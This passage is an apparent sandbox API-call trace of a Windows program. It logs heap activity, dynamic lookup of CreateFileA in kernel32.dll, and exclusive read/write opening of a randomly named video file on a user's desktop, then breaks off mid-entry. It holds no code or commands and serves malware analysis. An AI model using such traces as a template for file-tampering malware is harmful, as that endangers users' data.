[0168.150] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0168.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0168.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0168.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0168.150] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0168.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0168.150] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0168.150] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0168.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18b0 [0168.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0168.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0168.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0168.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0168.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0168.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0168.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd618 [0168.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0168.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0168.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0168.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0168.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0168.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0168.151] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0168.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0168.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0168.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0168.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0168.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0168.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0168.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0168.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0168.151] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0168.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0168.151] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0168.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0168.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0168.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0168.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0168.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0168.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0168.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0168.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0168.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0168.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0168.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0168.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0168.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0168.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0168.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0168.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0168.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0168.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0168.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0168.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0168.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0168.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0168.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0168.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0168.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0168.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0168.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0168.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0168.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0168.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0168.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0168.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0168.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0168.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0168.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0168.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0168.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0168.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0168.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0168.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0168.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0168.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0168.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0168.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0168.153] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.153] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0168.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0168.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0168.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0168.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0168.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0168.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0168.154] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0168.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0168.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0168.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0168.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0168.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0168.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0168.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0168.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0168.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0168.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0168.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.154] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0168.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0168.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0168.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0168.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0168.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0168.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0168.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0168.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0168.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0168.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0168.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0168.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0168.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0168.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0168.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0168.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0168.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0168.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0168.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0168.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0168.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0168.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0168.155] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0168.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.155] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0168.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0168.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0168.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0168.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0168.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0168.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0168.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0168.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0168.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0168.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0168.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0168.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0168.156] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0168.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0168.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0168.156] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd978 [0168.156] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd978, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0168.156] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0168.157] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0168.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0168.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0168.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0168.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0168.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0168.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd978 [0168.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd978, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0168.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0168.157] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0168.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0168.157] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0168.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0168.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0168.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0168.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0168.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0168.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0168.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0168.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0168.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0x9c5180 [0168.157] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wDndAAy--Qv4hO-j v.flv", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0168.157] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3d) returned 0x8db0a8 [0168.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wDndAAy--Qv4hO-j v.flv", cchWideChar=61, lpMultiByteStr=0x8db0a8, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wDndAAy--Qv4hO-j v.flv", lpUsedDefaultChar=0x0) returned 61 [0168.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0168.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0168.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0168.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0168.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0168.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0168.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0168.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0168.158] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wDndAAy--Qv4hO-j v.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wdndaay--qv4ho-j v.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0168.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0168.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0168.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0168.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0168.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0168.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0168.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0168.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0168.160] HeapFree (in: 